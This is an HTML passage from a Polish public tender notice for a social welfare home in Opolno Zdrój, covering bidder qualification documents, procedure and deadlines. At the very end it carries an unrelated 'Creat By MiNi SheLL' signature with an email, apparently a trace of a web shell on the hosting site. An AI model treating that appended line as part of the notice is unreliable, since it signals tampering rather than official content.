<ul class="kh_indent_1"><li><p>1)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że dostawy lub usługi zostały wykonane lub są wykonywane należycie. Do wykazu nalezy dołączyć eferencje.Ocena:spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.Ocena: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ Jędrek
ul. Parkowa 2
59-921 Opolno Zdrój
Opłata za udostępnienie Specyfikacji wynosi 30,00 zł  (trzydzieści złotych) oraz pokrywa koszty druku i przekazania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2010 godzina 10:00, miejsce: DOM POMOCY SPOŁECZNEJ Jędrek
ul. Parkowa 2
59-921 Opolno Zdrój
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com